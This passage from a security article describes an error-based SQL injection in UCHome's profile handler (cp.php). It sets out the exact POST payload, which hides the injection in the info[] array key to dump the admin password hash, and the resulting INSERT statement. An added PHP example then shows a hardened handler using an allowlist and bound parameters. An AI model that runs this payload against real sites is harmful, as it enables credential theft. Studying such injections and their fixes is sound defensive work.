Once the table prefix has been obtained from the preceding SQL error message, the password hash of the user admin can be dumped.
POST the following parameters to cp.php?ac=profile&op=info:
Profilesubmit = 1 & formhash = 232d1c54 & info [A', (select 1 from (select count (*), concat (SELECT concat (password) FROM uchome_member where username like 'admin % '), floor (rand (0) * 2) x from information_schema.tables group by x) a), '1') #] = 1
The resulting SQL statement is:
Insert into uchome_spaceinfo (uid, type, subtype, title, friend) VALUES ('3', 'info', '', (select 1 from (select count (*), concat (SELECT concat (password) FROM uchome_member where username like 'admin % '), floor (rand (0) * 2) x from information_schema.tables group by x) ), '1') # ', '1', '0 ')
The admin hash obtained is 6ad9ab1e6a74f51b57079c97329d208c; the last one is group_key.
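The request and statement above show the key of the info[] array arriving inside the INSERT as SQL text. The following is an added example of a hardened handler, not code from the original article or from UCHome: it checks the array key against an allowlist, binds every value, and keeps the raw SQL error out of the response. The function name, the allowlist entries, the friend value and the SQLite demo table are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist of profile field names; the real set is not on the page.
const ALLOWED_SUBTYPES = ['book', 'movie', 'music', 'interest'];

/**
 * Store info[subtype] = title pairs. Returns the keys that were refused.
 */
function save_space_info(PDO $db, int $uid, array $info): array
{
    $stmt = $db->prepare(
        'INSERT INTO uchome_spaceinfo (uid, type, subtype, title, friend)
         VALUES (:uid, :type, :subtype, :title, :friend)'
    );
    $rejected = [];
    foreach ($info as $subtype => $title) {
        // Keys of a POSTed array are client-controlled, just like the values.
        if (!is_string($subtype) || !is_string($title)
            || !in_array($subtype, ALLOWED_SUBTYPES, true)) {
            $rejected[] = (string) $subtype;
            continue;
        }
        try {
            // Bound parameters are sent as data and never parsed as SQL.
            $stmt->execute([':uid' => $uid, ':type' => 'info',
                ':subtype' => $subtype, ':title' => $title, ':friend' => '0']);
        } catch (PDOException $e) {
            // Log server-side only: the raw error text reveals table names.
            error_log('spaceinfo insert failed: ' . $e->getMessage());
            throw new RuntimeException('Profile update failed.');
        }
    }
    return $rejected;
}

// Constructed demo data on an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE uchome_spaceinfo
           (uid INTEGER, type TEXT, subtype TEXT, title TEXT, friend TEXT)');

$info = ['book' => "O'Reilly titles", "book', 'x" => '1']; // second key is malformed
$rejected = save_space_info($db, 3, $info);

$rows = (int) $db->query('SELECT COUNT(*) FROM uchome_spaceinfo')->fetchColumn();
printf("stored=%d rejected=%s\n", $rows, json_encode($rejected));
```

The value containing a quote is stored verbatim because it is bound, while the key containing a quote never reaches the statement.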
From: black box of RAyh4c
Popular Science on MySQL brute-force injection, part 1: http://www.bkjia.com/Article/201108/100722.html
Popular Science on MySQL brute-force injection, part 3: http://www.bkjia.com/Article/201108/100724.html